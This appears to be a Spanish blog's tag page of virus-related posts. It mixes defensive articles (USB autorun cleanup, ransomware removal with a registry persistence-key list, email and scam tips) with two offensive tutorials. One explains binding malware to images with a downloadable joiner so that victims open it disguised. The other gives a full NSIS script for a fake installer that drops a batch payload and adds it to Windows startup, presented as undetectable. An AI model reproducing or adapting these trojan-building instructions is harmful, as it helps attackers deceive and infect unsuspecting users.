RSS FEED
Mostrando entradas con la etiqueta virus. Mostrar todas las entradas
Mostrando entradas con la etiqueta virus. Mostrar todas las entradas

3 mar 2014

Nuevo virus detectado: Chameleon


Nuevo virus detectado: Chameleon

La Universidad de Liverpool, en Reino Unido, ha estado desarrollando un nuevo virus, que emula el funcionamiento de un resfriado común y corriente, se propaga a través del Wi-Fi.

Los científicos han simulado su propagación en las ciudades de Belfast y Londres y vieron que es más importante la densidad de puntos de acceso y dispositivos conectados que la seguridad e los mismos. El virus Camaleón es capaz de detectar los puntos débiles de las redes Wi-Fi de los usuarios, bien porque están desprotegidas o porque pueden acceder a ellas usando los datos de acceso que utilizan los fabricantes o los operadores que instalan las conexiones.

Es muy importante, tener actualizado el router para evitar vulnerabilidades y por supuesto tener modificado el acceso por defecto al router.

El profesor Alan Marshall ha explicado que que “cuando Camaleón ataca un punto de acceso no afecta a su funcionamiento pero es capaz de recabar y utilizar las claves de acceso de todos los usuarios que se han conectado”.

Con ese tipo de información, el virus va buscando otros puntos de acceso que pueda infectar. La clave está en que la mayoría de los antivirus están instalados en ordenadores y es donde buscan las infecciones, no en las redes, y Camaleón ha sido diseñado para infectar las redes, no los ordenadores, por lo que resulta invisible para los programas de seguridad. Cuando el virus encontraba un punto de acceso convenientemente protegido, simplemente pasaba a buscar otro más vulnerable. El equipo de investigadores está ahora estudiando nuevas técnicas para que los programas de seguridad puedan identificar y protegerse de este tipo de ataques.




1 nov 2012

Estafas y amenazas asustan en Halloween


Estafas y amenazas asustan en Halloween 

 Las estafas y las amenazas de virus maliciosos en Internet suelen incrementarse en fechas especiales, y Halloween no es la excepción, de acuerdo con la empresa de seguridad informática Symantec. En un comunicado, la compañía revela que las personas más vulnerables ante dichas amenazas son los niños, aunque los adultos también se encuentran expuestos y por ello deben de poner atención especial a sus conductas online. Agregó que la mayoría de los peligros en Internet durante esta época se relacionan con sitios para comprar disfraces, envíos de tarjetas o información sobre fiestas, las cuales tienen la intención de robar datos personales e información bancaria. Según el reporte de Cibercrimen 2012, realizado por Norton Symantec, más de 14.8 millones de personas en México han sido víctimas de delitos informáticos en el último año, lo cual representó pérdidas por 2.2 billones de dólares. Asimismo, señala que 77% de los adultos mexicanos ha sido víctima de algún tipo de estafa cibernética, y que los crímenes se están expandiendo hacia los dispositivos móviles, en donde los ataques aumentaron 98% el último año. Por ello, agrega, “los ataques con temas referentes a Halloween también pueden darse por esta vía, e independientemente de la época”, los usuarios deben estar alertas ante mensajes en los que les piden información personal, ya sea para realizar compras online o para ganar algún supuesto premio. Algunos consejos de seguridad que la compañía sugiere son navegar por páginas con buena reputación, enseñar a los niños a no responder mensajes spam y borrar los correos electrónicos no deseados. De igual forma, contar con un software de seguridad actualizado en dispositivos móviles y computadoras personales, crear contraseñas de alta complejidad, así como hablar con los menores sobre las diversas estafas que existen en Internet, con la finalidad de que puedan evitarlas.

16 sept 2012

Como meter un virus en una imagen



Como meter un virus en una imagen 


Lo primero que vamos a hacer es descargarnos Cactus Joiner v2.5 (puede que sea detectado por el antivirus), lo he subido para que lo pueda obtener todo el mundo. Descarga


¿Porque íbamos a introducir un programa malicioso en una imagen o en un archivo de texto? Fácil, cada vez es más complicado que las víctimas acepten un archivo ejecutable aunque este sea indetectable, por ello, se ha de engañar ocultando en un archivo aparentemente inofensivo como puede ser una foto o un texto.

Cactus Joiner nos permite unir archivos. Tiene varias opciones interesantes, como ejecutar en modo oculto nuestro "malware" o al ejecutar, extraer el virus en la carpeta temporal, la carpeta del sistema, o la misma carpeta del usuario. Otra característica es que puedes hacer que el nombre del virus al extraerse se cambie por algo mucho menos sospechoso como svch0st, twunk_64, etc...

Ahora os voy a enseñar como funciona, antes de ver el video, explicaros que no voy a meter un virus por razones obvias, voy a mostraros dos ejemplos, unir un virus a una imagen y un virus a un documento de texto.




(Pantalla completa)
Espero que os haya gustado este artículo. Pero recordad, sed buenos.

21 ago 2012

El correo electrónico y los virus


El correo electrónico y los virus



Todos los riesgos que se pueden dar en un explorador que ejecuta scripts y controles vuelven a aparecer cuando se usa un cliente de correo electrónico que le permite recibir mensajes con formato HTML, que pueden incluir el mismo tipo de códigos malignos.

En los primeros días del correo electrónico los programas eran sencillos y los mensajes se componían únicamente de texto. Pero cuando comenzó a ser posible enviar archivos adjuntos, se abrieron las puertas a un nuevo riesgo. Inicialmente se enviaban fotos( .jpg, .gif, etc...) o archivos de texto demasiado grande para incluirlo en el correo. El problema surge cuando el archivo adjunto es un ejecutable. Los archivos con extensiones .exe, .com o .bat son los ejemplos más claros, pero hay otros archivos que pueden ejecutar códigos, infectar el sistema y provocar daños a la máquina. Entre estos archivos se incluyen los archivos de salvapantallas (.scr), archivos de acceso directo (.ink), archivos modificadores del registro (.reg), archivos .url que pueden abrir Webs infectadas. Incluso los documentos de Word (.doc) pueden contener macros, que no son más que pequeños programas. Los programadores de virus han aprovechado las ventajas del soporte Visual Basic para Aplicaciones para crear virus macros que pueden infectar al sistema en cuanto se abre el documento que contiene el macro.

Como nos podemos proteger de los virus del correo electrónico

1 - Configurar nuestro correo, para no tener una vista previa de los correos, en la que se pueda abrir y descargar automáticamente el virus.

2 - Desconfiar, hay que estar seguro de que es el archivo adjunto para abrirlo. Hoy en día hasta en un archivo de música podemos encontrarnos un virus. En esto del correo electrónico ya no sirve que conozcas a la persona que te lo envía, pues existen virus que se autoenvían a toda la libreta de direcciones de la víctima.

3 - Después de desconfiar, necesitarás un antivirus que analice los correos entrantes y salientes.


Tres sencillos pasos para evitar un disgusto que puede ocurrirnos cualquier día. Espero sea muy útil.

16 oct 2011

¿Como solucionar todos los virus USB?




Muchos virus usan el tan conocido método de propagación por USB, el cual consiste en infectar el archivo autorun.inf.

La mayoría de los virus crea un archivo autorun.inf que contiene la ruta / ubicación de los virus en la raíz de cada unidad y al hacer doble clic en la unidad para abrirla el virus también se activa con la ayuda de ese fichero infectado.

Para solucionar esto, debemos seguir los siguientes pasos:

Primero de todo eliminar el archivo autorun.inf, que sino podemos manualmente haremos esto:

1º Desactivar temporalmente el AntiVirus, ir a la consola de comandos(cmd.exe) irnos a la unidad y escribir el siguiente comando:
attrib -h -r -s autorun.inf

2º Ahora lo borramos desde la unidad, pues se habrá hecho visible y ahora reactivamos el AntiVirus.

3º Creamos una carpeta llamada autorun.inf así ya estaremos seguros de que ningun malware pueda crearnos otro fichero infectado y fastidiarnos el USB o nuestro ordenador.

Saludos!

1 sept 2011

[Tutorial]Malware oculto en rutina de instalación




Cuantas veces, instalamos programas sin hacer ni caso a los posibles virus que puedan contener, pues aprovechandome de eso, he creado un instalador que en vez de instalar un programa, te infecta un pequeño script malicioso( este se puede cambiar por un virus programado en otro lenguaje y por tanto más potente). Así que lo primero que hice fue bajarme el NSIS (Nullsoft Scriptable Install System)



Explico, NSIS es una herramienta de código abierto, que permite mediante scripts, crear instaladores típicos que se suelen usar en Windows.

<a href="http://imageshack.us/photo/my-images/231/nsisscreenshot5.png/" target="_blank"><img src="" border="0"/></a>

Al final me quedó un código de este tipo:

;NSIS Modern User Interface
;Basic Example Script - Se encuentra aquí: C:\Program Files\NSIS\Examples\Modern UI

;Lo tenemos que compilar desde la carpeta: C:\Program Files\NSIS\Examples\Modern UI
;--------------------------------
;Include Modern UI
  !include "MUI2.nsh"
;--------------------------------
;General
  ;Name and file
  Name "Installer"
  OutFile "Basic.exe"
  ;Default installation folder - Donde instalamos nuestro malware
  InstallDir "C:\Windows"

  ;Get installation folder from registry if available
  InstallDirRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" "C:\Windows\config.bat"
  ;Request application privileges for Windows Vista
  RequestExecutionLevel user
;--------------------------------
;Interface Settings
  !define MUI_ABORTWARNING
;--------------------------------
;Pages
;Creamos una licencia que la pondremos junto a Basic.EXE que es el instalador
  !insertmacro MUI_PAGE_LICENSE "license.txt"
  !insertmacro MUI_PAGE_COMPONENTS
  !insertmacro MUI_PAGE_DIRECTORY
  !insertmacro MUI_PAGE_INSTFILES

  !insertmacro MUI_UNPAGE_CONFIRM
  !insertmacro MUI_UNPAGE_INSTFILES

;--------------------------------
;Languages

  !insertmacro MUI_LANGUAGE "Spanish"
Name "Example Program"
Caption "Darkc0de installer para Win32 Setup"
;--------------------------------
;Installer Sections
Section "Menu1" Sec1
  SetOutPath "$INSTDIR"

  ;ADD YOUR OWN FILES HERE...
  File config.bat
;Acabo de escribir la orden que hara que se extraiga nuestro malware, config.bat, en la ruta de instalación
  ;Store installation folder - O lo que es lo mismo, agregamos al inicio nuestro malware
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" $INSTDIR "C:\Windows\config.bat"

  ;Create uninstaller
  WriteUninstaller "$INSTDIR\Uninstall.exe"
SectionEnd
Section "Menu2" Sec2
;Aqui podemos añadir mas
SectionEnd
;--------------------------------
;Descriptions
;Para crear los menus en el instalador
  ;Language strings
  LangString DESC_Sec1 ${LANG_SPANISH} "Primer menu "
LangString DESC_Sec2 ${LANG_SPANISH} "segundo menu "
  ;Assign language strings to sections
  !insertmacro MUI_FUNCTION_DESCRIPTION_BEGIN
    !insertmacro MUI_DESCRIPTION_TEXT ${Sec1} $(DESC_Sec1)
   !insertmacro MUI_DESCRIPTION_TEXT ${Sec2} $(DESC_Sec2)
  !insertmacro MUI_FUNCTION_DESCRIPTION_END
;--------------------------------
;Uninstaller Section - Por si se diera el caso que se desinstala xD
Section "Uninstall"
  ;ADD YOUR OWN FILES HERE...
  Delete "$INSTDIR\Uninstall.exe"
  RMDir "$INSTDIR"
  DeleteRegKey /ifempty HKCU "Software\Example"
SectionEnd

Lo he comentado más de lo que ya estaba, y aún he de aclarar, que para hacerlo correr se compilar desde la carpeta NSIS\Examples\Modern UI y después ya podemos usarlo en cualquier lado.

Yo he hecho esto:



Y con eso ya podemos tener la libertad de crear un malware en BATCH y meterlo en config.bat y ya está añadido al Inicio de Windows. Totalmente indetectable y con la apariencia de un instalador normal.

Ahora queda lo importante, modificarlo, para que parezca de verdad un instalador de un programa normal, como Ares, Winamp, etc...

Cualquier duda sobre el lenguaje Script que utiliza NSIS, o dudas sobre el tutorial en general, preguntad en la entrada.



21 ago 2011

Como eliminar el virus de "La policía Española"

Desde hace unos dias, estamos sufriendo el acoso de un virus, que a simple vista parece una simple broma, pues nos aparece una imagen como está(o parecida):


Pero nos damos cuenta que no es una simple estafa, este virus, bloquea por completo las aplicaciones, desactiva el administrador de tareas, y cualquier combinación de teclas, tal como Windows + L, para cambiar usuario, este malware, se copia con diferentes nombres, y se puede encontrar en diversas rutas, como C:\Windows\Prefetch\readme[1].exe.pf, o en cualquier carpeta, de los usuarios.

Para eliminarlo:



1-Si estamos en Windows Vista o Windows 7, podemos intentar entrar con Ctrl+Alt+Supr a la pantalla de presentación, donde podemos cambiar de usuario, y desde ahí eliminar el proceso y pasar un antivirus. Esto en Windows XP no funciona, porque si apretamos Ctrl+Alt+Supr, nos sale un mensaje de que el Administrador de tareas esta desactivado(por el virus).

2- Entrar con un Live CD de cualquier distribución GNU/Linux, aquí os dejó la de Ubuntu, que es la distro más básica, http://www.ubuntu.com/download/ubuntu/download. con el LiveCD entramos a la partición donde este Windows y buscamos el archivo y lo eliminamos, iniciamos Windows y editamos la entrada del registro esta: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell donde se ubica, también es conveniente buscar en estas siguientes rutas del registro:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows
HKLM\System\CurrentControlSet\Control\Session Manager\KnownDLLs
HKLM\System\ControlSet001\Control\Session Manager\KnownDLLs/f


3- El siguiente paso por el momento, y hasta que los antivirus no incluyan la firma de este nuevo virus, es meterse en el Modo de símbolo de sistema, en Modo Seguro NO, porque el virus lo tiene también infectado, desde el símbolo del sistema, borramos el virus de alguna de estas rutas.

4- Para conseguir más tiempo, antes de que se bloquee el ordenador, solo basta con cambiar la hora en la bios. Se hace así, pulsa Supr o Del, y accederas al menu de la Bios, entras en Standard CMOS Features, y desde ahí retrasas 2 o 3 horas para tener más tiempo para arreglarlo.

El virus de La Pôlicía Española, tiene diversas formas, pero todas coinciden en efectos y en la forma de aparición, lo que no se sabe aún es su propagación.

Saludos y recordad que este tema se irá renovando.

Arriba